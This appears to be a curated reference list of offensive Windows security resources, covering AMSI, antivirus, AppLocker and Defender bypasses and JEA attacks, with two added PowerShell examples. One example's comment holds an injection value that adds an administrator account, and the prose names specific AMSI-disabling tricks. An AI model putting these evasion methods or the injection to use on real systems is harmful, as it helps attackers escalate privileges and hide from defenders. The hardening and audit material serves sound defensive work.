- This post is about an arbitrary file move vulnerability I found in the Background Intelligent Transfer Service. This is yet another example of a privileged file operation abuse in Windows 10. There is nothing really new but the bug itself is quite interesting because it was hidden in an undocumented function. Therefore, I will explain how I found it and I will also share some insights about the reverse engineering process I went through in order to identify the logic flaw.
- [CVE49] Microsoft Windows LNK Remote Code Execution Vulnerability - CVE-2020-1299 - linhlhq from Infiniti Team - VinCSS
Just-Enough-Administration(JEA)
Get $pwnd: Attacking Battle Hardened Windows Server - Lee Holmes - Defcon25
- Windows Server has introduced major advances in remote management hardening in recent years through PowerShell Just Enough Administration ("JEA"). When set up correctly, hardened JEA endpoints can provide a formidable barrier for attackers: whitelisted commands, with no administrative access to the underlying operating system. In this presentation, watch as we show how to systematically destroy these hardened endpoints by exploiting insecure coding practices and administrative complexity.
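What "insecure coding practices" in a JEA endpoint looks like in practice, as an added illustration rather than material from the talk: one role capability written two ways. Every name in it is hypothetical (the `C:\Temp` paths, the `Get-ServiceLog` function, the service names), and it assumes Windows PowerShell 5.1 on the endpoint. The point to keep in mind is that a JEA session runs as a privileged virtual account, so any way of turning caller input into an unconstrained command is a full escalation, not a minor bug.

```powershell
# Added illustration, not material from the talk: one JEA role capability written
# two ways. Everything here is hypothetical (paths, function, service names); it
# assumes Windows PowerShell 5.1 on the endpoint. JEA sessions run as a
# privileged virtual account, so turning caller input into an unconstrained
# command is a full escalation.

# --- Weak role: caller input is spliced into a string that becomes code -----
$weak = @{
    Path                = 'C:\Temp\ServiceOps-Weak.psrc'
    VisibleCmdlets      = 'Restart-Service'            # any service, any parameter
    FunctionDefinitions = @{
        Name        = 'Get-ServiceLog'
        ScriptBlock = {
            param([string]$Name)
            # Name = 'w3svc.log; net localgroup Administrators attacker /add #'
            # runs the second command as the virtual (local admin) account.
            Invoke-Expression "Get-Content -Path C:\Logs\$Name -Tail 50"
        }
    }
}
New-PSRoleCapabilityFile @weak

# --- Hardened role: whitelist parameter values, validate input, never eval ---
$hardened = @{
    Path                = 'C:\Temp\ServiceOps-Hardened.psrc'
    VisibleCmdlets      = @{
        Name       = 'Restart-Service'
        Parameters = @{ Name = 'Name'; ValidateSet = 'W3SVC', 'Spooler' }   # only these services
    }
    FunctionDefinitions = @{
        Name        = 'Get-ServiceLog'
        ScriptBlock = {
            param([ValidatePattern('^[A-Za-z0-9_-]{1,64}$')][string]$Name)
            $root = 'C:\Logs'
            $full = [IO.Path]::GetFullPath((Join-Path $root "$Name.log"))
            # Belt and braces: even if the pattern were loosened, refuse anything
            # that resolves outside the log root.
            if (-not $full.StartsWith("$root\", [StringComparison]::OrdinalIgnoreCase)) {
                throw 'log name resolves outside the log root'
            }
            Get-Content -LiteralPath $full -Tail 50   # no string-to-code step anywhere
        }
    }
}
New-PSRoleCapabilityFile @hardened
```

Role capability files are only found by name when they live in a module's `RoleCapabilities` folder under a path in `$env:PSModulePath`, so the `C:\Temp` locations above are placeholders; the hardened file is then wired up with `New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -RunAsVirtualAccount -RoleDefinitions @{ 'DOMAIN\ServiceOps' = @{ RoleCapabilities = 'ServiceOps-Hardened' } }` and `Register-PSSessionConfiguration`. Reviewing an existing endpoint reduces to reading every `FunctionDefinitions` body for an `Invoke-Expression`, `Start-Process`, `&` or `.` that consumes a parameter, and every `VisibleCmdlets` entry that has no `Parameters` constraint.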
Microsoft
- From Hyper-V Admin to SYSTEM - decoder.cloud
Windows Credential Theft: RDP & Internet Explorer 11
- NTLM hashes/relay through RDP files and an IE11 XXE, explained
MSSQL
PowerUpSQL - 2018 Blackhat USA Arsenal
- This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
VirtualMachines
InviZzzible
- InviZzzible is a tool for assessment of your virtual environments in an easy and reliable way. It contains the most recent and up to date detection and evasion techniques as well as fixes for them. Also, you can add and expand existing techniques yourself even without modifying the source code.
VMWare
VMware Escape Exploit
- VMware Escape Exploit before VMware WorkStation 12.5.5
- A bunch of Red Pills: VMware Escapes - Marco Grassi, Azureyang, Jackyxty
VMware Exploitation
- A bunch of links related to VMware escape exploits
Defense Evasion
101
- String Replacement & Obfuscation
- Runtime modification (Polymorphism)
- Sandbox detection & Avoidance
- Log Avoidance & Deletion
Articles/Blogposts/Writeups
- Quiet in the Windows: Dropping Network Connections - Eviatar Gerzi
DropNet
- A tool that can be used to close network connections automatically, given a set of parameters
- Evade the analyst - Forensics|Exchange(2019)
Talks/Presentations/Videos
Noob 101: Practical Techniques for AV Bypass - Jared Hoffman - ANYCON 2017
- The shortcomings of anti-virus (AV) solutions have been well known for some time. Nevertheless, both public and private organizations continue to rely on AV software as a critical component of their information security programs, acting as a key protection mechanism over endpoints and other information systems within their networks. As a result, the security posture of these organizations is significantly jeopardized by relying only on this weakened control.
Evading Autoruns - Kyle Hanslovan, Chris Bisnett(DerbyCon7)
- When it comes to offense, maintaining access to your endpoints is key. For defenders, it's equally important to discover these footholds within your network. During this talk, Kyle and Chris expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass includes a live demo and recommendations for detection.
- RE: Evading Autoruns PoCs on Windows 10 - Kyle Hanslovan
- Evading Autoruns - DerbyCon 7.0
Antivirus Evasion: Lessons Learned – thelightcosine(Derbycon2013)
- Over the past year, the speaker has spent a lot of time talking with people in the infoSec Community and doing research on antivirus evasion techniques. Learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads.
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) - Trenton Ivey, Neal Bridges(Derbycon2013)
- Think of the last time you got sick. Your immune system is an amazing piece of machinery, but every now and then, something gets past it. Antivirus evasion techniques can become more effective when modeled after infectious diseases. This talk highlights many of the antivirus evasion techniques in use today. Going further, this talk shows how genetic algorithms can quickly and repeatedly “evolve” code to evade many malicious code detection techniques in use today.
Bypassing Antivirus: With Understanding Comes Ease - Jeff McJunkin(WWHF Deadwood2020)
- The job of a penetration tester is to emulate real-world, realistic adversaries to compromise the client and explain the business risks of the technical findings. Those pesky real-world adversaries bypass AV all the time, even with essentially the same malware, over and over. How do they do it? Simple. By understanding what traps AV is setting, you can step around, jump over, or disable those traps before sauntering to your destination unhindered. I can't help with your saunter, but I can help you understand and bypass AV using arbitrary payloads (whether Cobalt Strike, Metasploit, Covenant, Mystic, SILENTTRINITY, or whichever) in many ways, all in less than an hour.
- The Art of bypassing endpoint protections for red teaming engagements - Eslam Reda, Jameel Nabbo(2020)
Evading Detection A Beginner's Guide to Obfuscation - BC-Security(2021)
- Have you wanted to learn some more advanced Windows evasion techniques? Here is your chance to learn from the experts. This 2-hour long webinar will cover the basics of Windows Defenses such as Event and Script Block Logging, Anti-Malware Scan Interface (AMSI), and Windows Defender. Next, we will demonstrate obfuscations and evasion techniques that Advanced Persistent Threats (APTs) employ to evade modern defenses.
AMSI
101
- Remember kids, it's not a security boundary according to MS. Just like UAC, and AppLocker. Just something they threw in there for funsies. Totally not about security. Nope. No way. Nuh uh. Never in a million years. (Just a little salty after reading some official documentation saying so)
- Antimalware Scan Interface (AMSI) - docs.ms
- Developer audience, and sample code - docs.ms
- Antimalware Scan Interface (AMSI) functions - docs.ms
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It - Nikhil Mittal(BHUS16)
- Blogpost
- Paper
- In Windows 10, Microsoft introduced the AntiMalware Scan Interface (AMSI) which is designed to target script-based attacks and malware. Script-based attacks have been lethal for enterprise security and with advent of PowerShell, such attacks have become increasingly common. AMSI targets malicious scripts written in PowerShell, VBScript, JScript etc. and drastically improves detection and blocking rate of malicious scripts. When a piece of code is submitted for execution to the scripting host, AMSI steps in and the code is scanned for malicious content. What makes AMSI effective is, no matter how obfuscated the code is, it needs to be presented to the script host in clear text and unobfuscated. Moreover, since the code is submitted to AMSI just before execution, it doesn't matter if the code came from disk, memory or was entered interactively. AMSI is an open interface and MS says any application will be able to call its APIs. Currently, Windows Defender uses it on Windows 10. Has Microsoft finally killed script-based attacks? What are the ways out? The talk will be full of live demonstrations.
- Announcing the .NET Framework 4.8 - devblogs.ms (relevant here because 4.8 added AMSI scanning of assemblies loaded through Assembly.Load, which is why in-memory .NET tradecraft now trips AMSI as well)
whoamsi
- The purpose of this page is to be a repository of endpoint protection (AV, EDR, etc) that uses Microsoft's Antimalware Scan Interface (AMSI). This will provide some context around endpoint protection and possible attack vectors. Products with information missing have not been verified yet. This project expands on the work done by @Lee_Holmes and @PyroTek3 by keeping a publicly available list up-to-date.
AMSI Internals
- The Rise and Fall of AMSI - Tal Liberman(BHAsia 2018)
IAmsiStream interface sample - MS Github
- Demonstrates how to use the Antimalware Scan Interface to scan a stream.
- Antimalware Scan Interface (AMSI) functions - docs.ms
AMSI Bypass - Paul Laine(2019)
- This blog post explains the inner workings of AMSI, and describes a new bypass technique (related to AmsiScanBuffer).
- AMSI Module Remote In-Memory Patch - Paul Laine(2020)
MS Office file format sorcery - Stan Hegt, Pieter Ceelen(Troopers19)
- Slides
- A deep dive into file formats used in MS Office and how we can leverage these for offensive purposes. We will show how to fully weaponize ‘p-code’ across all MS Office versions in order to create malicious documents without using VBA code, successfully bypassing antivirus and other defensive measures. In this talk Stan and Pieter will do a deep dive into the file formats used in MS Office, demonstrating many features that can be used offensively. They will present attacks that apply to both the legacy formats (OLE streams) and the newer XML based documents. Specific focus is around the internal representation of VBA macros and pseudo code (p-code, execodes) and how these can be weaponized. We will detail the inner logic of Word and Excel regarding VBA and p-code, and release scripts and tools for creating malicious Office documents that bypass anti-virus, YARA rules, AMSI for VBA and various MS Office document analyzers.
Bypasses
Compilations
Amsi-Bypass-PowerShell - S3cur3Th1sSh1t
- List of Bypasses
- Antimalware Scan Interface (AMSI) — A Red Team Analysis on Evasion - iwantmore.pizza
- Exploring PowerShell AMSI and Logging Evasion - Adam Chester(2018)
Adventures in the Wonderful World of AMSI. - byte_st0rm(2019)
- Overview: rather than using LoadLibrary and GetProcAddress to locate amsi.dll and AmsiScanBuffer, walk the process's PEB and the export directory of amsi.dll.
- How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code - modexp(2019)
- AMSI - Resurrecting the Dead - Crawl3r(2020)
General Stuff
- How to bypass AMSI and execute ANY malicious Powershell code - zc00l
- Weaponizing AMSI bypass with PowerShell - @0xB455(2019)
AMSI.fail
- C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.
AMSI.fail4
- Converted AMSI.fail to a .NET Framework 4 solution so that it can be called from PowerShell 5.
- Bypassing AV (Windows Defender) … the tedious way. - CB Hue(2019)
- Use PSv2: the PowerShell 2.0 engine predates AMSI (and script block logging), so where the optional v2 engine is still installed, powershell.exe -Version 2 runs scripts with no AMSI integration at all
- Obfuscation
DLL Hijack
- Bypassing Amsi using PowerShell 5 DLL Hijacking - cn33liz(2016)
- Disabling AMSI in JScript with One Simple Trick - James Forshaw(2018)
Resurrecting an old AMSI Bypass - Philippe Vogler(2020)
- Before the latest Windows Defender update, and possibly with other endpoint security products, regardless of access rights on a host, users can bypass AMSI for PowerShell. Other scripting engines such as jscript or cscript do not suffer from this DLL hijack and directly load AMSI from the System32 folder.
COM Server Hijack
Bypassing AMSI via COM Server Hijacking - Enigma0x3
- This post will highlight a way to bypass AMSI by hijacking the AMSI COM server, analyze how Microsoft fixed it in build #16232 and then how to bypass that fix. This issue was reported to Microsoft on May 3rd, and has been fixed as a Defense in Depth patch in build #16232.
Null Character
Registry Key
- [The Rise and Fall of AMSI - Tal Liberman(BH Asia18)](https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf)
Patching AmsiScanString
Patching AmsiScanBuffer
- RastaMouse AmsiScanBuffer Bypass Series(2018)
- How to bypass AMSI and execute ANY malicious Powershell code - zc00l(2018)
- AMSI Bypass Redux - Avi Gimpel(2018)
- Alternative AMSI bypass - Benoit Sevens(2018)
- Yet another update to bypass AMSI in VBA - Khris Tolbert(2019)
- Hunting for AMSI bypasses - Wee-Jing Chung(2019)
- Execute any "evil" Powershell code by bypassing AMSI - Dec0ne(2019)
- Understanding and Bypassing AMSI - Tom Carver(2020)
AmsiHook
- AmsiHook is a DLL that, when injected into a process that uses AMSI, hooks the AMSI functions so that they are called with dummy parameters.
Tools
AmsiScanBufferBypass
- Circumvent AMSI by patching AmsiScanBuffer
AmsiInitialize
- Patchless AMSI bypass using SharpBlock - Ceri Coburn(2020)
SharpBlock
- A method of bypassing EDR active protection DLLs by preventing entry point execution.
Forcing an Error
- Manually set the amsiInitFailed field of System.Management.Automation.AmsiUtils to $true: the PowerShell host then believes AMSI initialization failed and skips scanning for the rest of the process.
Jscript9.dll
Heap-based
- How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code - modexp(2019)
Heap-based AMSI bypass for MS Excel VBA and others - Dan@CodeWhite(2019)
- This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of a heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.
CorruptCLRGlobal.ps1 - Matt Graeber
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
- AMSI in the HEAP x32 - secureyourit.co.uk(2020)
Hooking
Goodbye Obfuscation, Hello Invisi-Shell: Hiding Your Powershell Script in Plain Sight - Omer Yair(Derbycon2018)
- “The very concept of objective truth is fading out of the world. Lies will pass into history.” George Orwell. Objective truth is essential for security. Logs, notifications and saved data must reflect the actual events for security tools, forensic teams and IT managers to perform their job correctly. Powershell is a prime example of the constant cat and mouse game hackers and security personnel play every day to either reveal or hide the “objective truth” of a running script. Powershell’s auto logging, obfuscation techniques, AMSI and more are all participants of the same game playing by the same rules. We don’t like rules, so we broke them. As a result, Babel-Shellfish and Invisi-Shell, two new tools that both expose and disguise powershell scripts, were born. Babel-Shellfish reveals the inner hidden code of any obfuscated script while Invisi-Shell offers a new method of hiding malicious scripts, even from the Powershell process running it. Join us as we present a new way to think about scripts.
- Invisi-Shell
- Understanding and Bypassing AMSI - Tom Carver(2020)
Compilations
Bypass Talks
- AMSI: How Windows 10 Plans To Stop Script Based Attacks And How Well It Does It - Nikhil Mittal(BHUSA16)
Antimalware Scan Interface (AMSI) - Dave Kennedy(WWHF2018)
- This talk will dive into the Antimalware Scan Interface (AMSI) as well as other alternatives in the “NextGen” series of preventative measures and show how trivial it is to write code that doesn’t get snagged. The security market is focusing on open source data collection sources and security researchers as the main method to write signatures to detect attacks, much like what we saw in the 90s with traditional anti-virus tech. Not much has changed, let’s dive into the reality in security and how little these protective measures really do in the grand scheme of things. We’ll also be covering solid practices in defending against attacks, and what we should be focusing on.
- PSAmsi An offensive PowerShell module for interacting with the Anti Malware Scan Interface in Windows - Ryan Cobb(Derbycon7)
- Red Team TTPs Part 1: AMSI Evasion - paranoidninja
Bypass Tools
CorruptCLRGlobal.ps1
- A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
AMSI Bypass Code Snippet Examples
- "This repo contains some Amsi Bypass methods i found on different Blog Posts."
PSAmsi
- PSAmsi is a tool for auditing and defeating AMSI signatures. It's best utilized in a test environment to quickly create payloads you know will not be detected by a particular AntiMalware Provider, although it can be useful in certain situations outside of a test environment. When using outside of a test environment, be sure to understand how PSAmsi works, as it can generate AMSI alerts.
powershellveryless
- Constrained Language Mode + AMSI bypass all in one
AmsiBypass
- C# PoC implementation for bypassing AMSI via in memory patching
NoAmci
- A PoC for using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load(). .Net tradecraft can be compressed, encoded (encrypted if required) in order to keep the assembly size less than 1MB, then embedded as a resource to be loaded after patching amsi.dll memory.
VBA Specific
101
Blogposts
- Dynamic Microsoft Office 365 AMSI In Memory Bypass Using VBA - Richard Davy, Gary Nield(2019)
- The Document that Eluded AppLocker and AMSI - ZLAB-YOROI
- Office 365 AMSI Bypass (fixed) - Iliya Dafchev(2019)
Bypassing AMSI for VBA - Pieter Ceelen
- This blog is a writeup of the various AMSI weaknesses presented at the Troopers talk ‘MS Office File Format Sorcery‘ and the Blackhat Asia presentation ‘Office in Wonderland’.
Adventures in the Wonderful World of AMSI. - byte_st0rm(2019)
- Overview: rather than using LoadLibrary and GetProcAddress to locate amsi.dll and AmsiScanBuffer, walk the process's PEB and the export directory of amsi.dll.
- AMSI in the HEAP x32 - secureyourit.co.uk(2020)
Instrumenting AMSI
Articles/Blogposts/Writeups
- AMSI as a Service — Automating AV Evasion - James(2019)
- Hunting for malicious strings using AmsiTrigger - RythmStick(2020)
AMSI Scanner
- A C/C++ implementation of Microsoft's Antimalware Scan Interface
amsi-tracer
- Leverage AMSI (Antimalware Scan Interface) technology to aid your analysis. This tool saves all buffers (scripts, .NET assemblies, etc) passed into AMSI during dynamic execution.
- Antimalware Scan Interface Detection Optics Analysis Methodology: Identification and Analysis of AMSI for WMI - Matt Graeber(2019)
Tools
- MalwareScan.AMSI
AMSITrigger v3
- The Hunt for Malicious Strings
Anti-Virus
101
Articles/Blogposts/Writeups
Code Runners
Execute ShellCode Using Python
- In this article I am going to show you how we can use Python and its "ctypes" library to execute "calc.exe" shellcode or any other shellcode.
- Bypassing AV's like its 2001 - Flangvik(2020)
Code Signing
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
- File Templates
- History
- Obfuscation
Polymorphism
- See 'Polymorphism' under 'Specific Techniques'
- String Modification
Application Whitelisting
101
Articles/Blogposts/Writeups
- Escaping the Microsoft Office Sandbox: a faulty regex allows malicious code to escape and persist - Adam Chester
- Microsoft Applications and Blocklist - FortyNorthSecurity
- Technical Advisory: Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint - Soroush Dalili
- Bypassing Application Whitelisting with BGInfo - Oddvar Moe
- Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner - exploit-monday.com
- Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)
- How to Evade Application Whitelisting Using REGSVR32 - Joff Thyer
- Bypassing Application Whitelisting with runscripthelper.exe - Matt Graeber
- Using Application Compatibility Shims - subTee
- Consider Application Whitelisting with Device Guard - subTee
- Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations - subTee
- Setting Up A Homestead In the Enterprise with JavaScript - subTee
Application Whitelist Bypass Techniques
- A Catalog of Application Whitelisting Bypass Techniques - SubTee
- BinariesThatDoesOtherStuff.txt - api0cradle
- VBA RunPE - Breaking Out of Highly Constrained Desktop Environments - Part 1/2 - itm4n
Talks & Presentations
Fantastic Red-Team Attacks and How to Find Them - Casey Smith, Ross Wolf(BHUSA 2019)
- This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
- Slides
- Blogpost
Tools
- MS Signed mimikatz in just 3 steps
GreatSCT
- The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.
RunMe.c
- Trick to run arbitrary command when code execution policy is enforced (i.e. AppLocker or equivalent). Works on Win98 (lol) and up - tested on 7/8
- Window Signed Binary
VBA-RunPE
- A VBA implementation of the RunPE technique or how to bypass application whitelisting.
Applocker
-
101
-
Ultimate AppLocker ByPass List
- "The goal of this repository is to document the most common and known techniques to bypass AppLocker. Since AppLocker can be configured in different ways I maintain a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone. I also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs."
-
myAPPLockerBypassSummary
- Simple APPLocker bypass summary based on the extensive work of @api0cradle
-
Ultimate AppLocker ByPass List
-
Articles/Blogposts/Writeups
- AppLocker Bypass Checklist - netbiosX
- AppLocker Case study: How insecure is it really? Part 1 oddvar.moe
- AppLocker Case study: How insecure is it really? Part 2](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)
- AppLocker Bypass – Weak Path Rules
- Applocker Bypass via Registry Key Manipulation
- Bypassing AppLocker Custom Rules - 0x09AL Security Blog
- AppLocker Bypass – CMSTP - netbiosX
- Bypassing AppLocker Custom Rules
-
A small discovery about AppLocker - oddvar.moe
- 'While I was prepping for a session a while back I made a a little special discovery about AppLocker. Turns out that the files that AppLocker uses under C:\Windows\System32\AppLocker can be used in many cases to bypass a Default AppLocker ruleset.'
- Applocker Bypass via Registry Key Manipulation - Francesco Mifsud
- Bypassing AppLocker Custom Rules - 0x09AL
-
myAPPLockerBypassSummary
- Simple APPLocker bypass summary based on the extensive work of @api0cradle
- Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies - sixdub(2014)
-
AppLocker Bypass – File Extensions - pentestlab.blog(2017)
- Bypassing AppLocker restrictions usually requires the use of trusted Microsoft binaries that can execute code or weak path rules. However it is possible in a system that it has been configured with default rules and it is allowing the use of command prompt and PowerShell to the users to bypass AppLocker by using payloads with different file extensions.
-
Bring your own .NET Core Garbage Collector - Paul Laine(2020)
- This blog post explains how it is possible to abuse a legitimate feature of .Net Core, and exploit a directory traversal bug to achieve application whitelisting bypass.
- Code
- Abusing .NET Core – Evasion - pentestlaboratories.com
- Bypassing Windows protection mechanisms & Playing with OffensiveNim - s3cur3th1ssh1t(2020)
- Signed Binary Proxy Execution via PyCharm - ArchCloudLabs(2021)
-
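The "weak path rules" and default-ruleset findings above come down to one question: does an Allow path rule cover a directory the current user can write to? The following added PowerShell example (not from any project listed here) answers it against the effective policy. It assumes Windows PowerShell 5.1 with the AppLocker module on a host where a policy applies; the `$CandidateDirs` list is a constructed starting set of locations that are writable by Authenticated Users on a stock install, and the only side effect is an empty probe file created and deleted in each directory tested.

```powershell
# Added example, not from any project listed here: audit the effective AppLocker
# policy for Allow path rules whose scope includes a directory the current user
# can write to (the "weak path rule" class of bypass). Assumes Windows
# PowerShell 5.1 with the AppLocker module on a host where a policy applies.
# Side effect: one empty probe file is created and deleted per directory tested.

function Test-DirWritable([string]$Dir) {
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

# Expand the variables AppLocker uses in FilePathCondition; %PROGRAMFILES% maps
# to both Program Files directories on 64-bit Windows.
function Expand-AppLockerPath([string]$Path) {
    $map = [ordered]@{
        '%SYSTEM32%'     = @("$env:SystemRoot\System32")
        '%WINDIR%'       = @($env:SystemRoot)
        '%PROGRAMFILES%' = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
        '%OSDRIVE%'      = @($env:SystemDrive)
    }
    foreach ($var in $map.Keys) {
        if ($Path.ToUpperInvariant().StartsWith($var)) {
            return @($map[$var] | ForEach-Object { $_ + $Path.Substring($var.Length) })
        }
    }
    @($Path)    # %REMOVABLE%, %HOT% or a literal path: left as-is
}

# Directories under the default rules' roots that Authenticated Users can write
# to on a stock install. Constructed starting set; add what you find on the target.
$CandidateDirs = @(
    "$env:SystemRoot\Tasks",
    "$env:SystemRoot\Temp",
    "$env:SystemRoot\tracing",
    "$env:SystemRoot\System32\spool\drivers\color"
)

function Find-WeakAppLockerPathRule {
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    foreach ($coll in $policy.AppLockerPolicy.RuleCollection) {
        if ($coll.EnforcementMode -eq 'NotConfigured') { continue }
        foreach ($rule in @($coll.FilePathRule) | Where-Object { $_ -and $_.Action -eq 'Allow' }) {
            foreach ($cond in @($rule.Conditions.FilePathCondition)) {
                foreach ($root in Expand-AppLockerPath $cond.Path) {
                    if (-not $root.EndsWith('*')) { continue }       # a single-file rule has no subtree
                    $base = $root.TrimEnd('*').TrimEnd('\')
                    foreach ($dir in $CandidateDirs) {
                        if ($dir.StartsWith($base, [StringComparison]::OrdinalIgnoreCase) -and (Test-DirWritable $dir)) {
                            [pscustomobject]@{
                                Collection  = $coll.Type
                                Enforcement = $coll.EnforcementMode
                                Rule        = $rule.Name
                                RulePath    = $cond.Path
                                WritableDir = $dir
                            }
                        }
                    }
                }
            }
        }
    }
}

Find-WeakAppLockerPathRule | Format-Table -AutoSize
```

The function ignores a rule's `Exceptions` element, so a hit under a rule that explicitly excepts the flagged directory is a false positive; read the rule before acting on it. An `AuditOnly` collection is reported too, since the rule would be weak the day enforcement is switched on. The fix on the defensive side is the one the linked case studies arrive at: replace `%WINDIR%\*` style path rules with publisher or hash rules, or add exceptions for every writable directory under the root.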
Talks/Presentations/Videos
GreatSCT: Gotta Catch 'Em AWL - Chris Spehn(CircleCityCon2018)
- Great Scott Marty, we went all the way back to 1995! The project is called Great SCT (Great Scott). GreatSCT is an open source project to generate application whitelist (AWL) bypasses. This tool is intended for BOTH red and blue team. Blue team can benefit by testing the publicly known application whitelisting bypass methods. We will review the most common application whitelisting bypass methods and how to utilize these methods with GreatSCT.
Tools
Backdoor-Minimalist.sct
- Applocker bypass
Evasor
- The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suits both blue and red teams in the assessment of a post-exploitation phase.
Windows Defender Application Control
-
101
- Application Control for Windows - docs.ms
- Windows Defender Application Control and AppLocker Overview - docs.ms
- Windows Defender Application Control design guide - docs.ms
- Deploy Windows Defender Application Control policies by using Group Policy - docs.ms
- Plan for Windows Defender Application Control lifecycle policy management - docs.ms
- Planning and getting started on the Windows Defender Application Control deployment process
-
Articles/Blogposts/Writeups
-
Documenting and Attacking a Windows Defender Application Control Feature the Hard Way — A Case Study in Security Research Methodology - Matt Graeber
- My goal for this blog post is to not only describe the mechanics of this new feature, but more importantly, I wanted to use this opportunity to paint a picture of the methodology I applied to understand and attempt to bypass the feature. So, if you’re already interested in WDAC features, great. If you’re not, that’s also cool but I hope you’ll follow along with the specific strategies I took to understand an undocumented Windows feature.
- Exploring the WDAC Microsoft Recommended Block Rules: VisualUiaVerifyNative - BOHOPS(2020)
- Talks/Presentations/Videos
- Tools
-
Attack Surface Reduction
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Defender
-
101
- Next-generation protection in Windows 10, Windows Server 2016, and Windows Server 2019 - docs.ms
- Microsoft Defender Advanced Threat Protection - docs.ms
- Microsoft Defender ATP Blog - Microsoft
-
Configure Microsoft Defender Antivirus exclusions on Windows Server - docs.ms
- "Microsoft Defender Antivirus on Windows Server 2016 and 2019 automatically enrolls you in certain exclusions, as defined by your specified server role. See the list of automatic exclusions (in this article). These exclusions do not appear in the standard exclusion lists that are shown in the Windows Security app."
-
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware - ms.com
- Manual updates for Defender
-
DisableAntiSpyware - docs.ms
- Reg key to disable Defender on 1903 and prior.
- Fun times trying to get this working in later versions....
- Reverse engineering Windows Defender's signature for Metasploit Framework's metsrv.dll - plowsec(StackOverflow2018)
- comment by plowsec on Metasploit Project(2018)
-
Articles/Blogposts/Writeups
- Untangling the “Windows Defender” Naming Mess - Lenny Zeltser
- Bypass Windows Defender Attack Surface Reduction - Emeric Nasi
- Documenting and Attacking a Windows Defender Application Control Feature the Hard Way — A Case Study in Security Research Methodology - Matt Graeber
- Bypassing AV (Windows Defender) … the tedious way. - CB Hue
-
Dear Windows Defender, please tell me where I can drop my malicious code. - Simone Aonzo
- 'The Get-MpPreference cmdlet exposes the field ExclusionPath without administrator privilege.'
- Hiding Metasploit Shellcode to Evade Windows Defender - Rapid7
- Incapacitating Windows Defender - offensiveops.io
- Evading Windows Defender with 1 Byte Change - @spottheplanet
- Bypassing Windows Defender Runtime Scanning - Charalampos Billinis(2020)
- Silencing Microsoft Defender for Endpoint using firewall rules - Søren Fritzbøger(2021)
- Bypass Defender and other thoughts on Unicode RTLO attacks - Emeric Nasi(2020)
-
Talks/Presentations/Videos
- Reverse Engineering Windows Defender’s JavaScript Engine - Alexei Bulazel(REcon Brussels18)
- Auditing and Bypassing Windows Defender Application Control - Matt Graeber
-
Bypass Windows Exploit Guard ASR - Emeric Nasi(OffensiveCon2020)
